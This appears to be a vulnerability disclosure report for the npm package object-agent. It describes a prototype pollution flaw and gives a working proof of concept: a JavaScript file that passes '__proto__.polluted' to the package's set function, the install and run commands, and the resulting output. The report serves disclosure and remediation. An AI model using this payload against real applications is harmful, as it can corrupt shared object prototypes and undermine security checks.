Prototype Pollution in darrenpaulwright/object-agent

Valid

Reported on

Jan 4th 2021


Description

object-agent is vulnerable to Prototype Pollution.

Proof of Concept

  1. Create the following PoC file:
// poc.js
import { set } from 'object-agent';
var obj = {}
console.log("Before : " + {}.polluted);
set(obj, '__proto__.polluted', 'Yes! Its Polluted');
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i object-agent # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation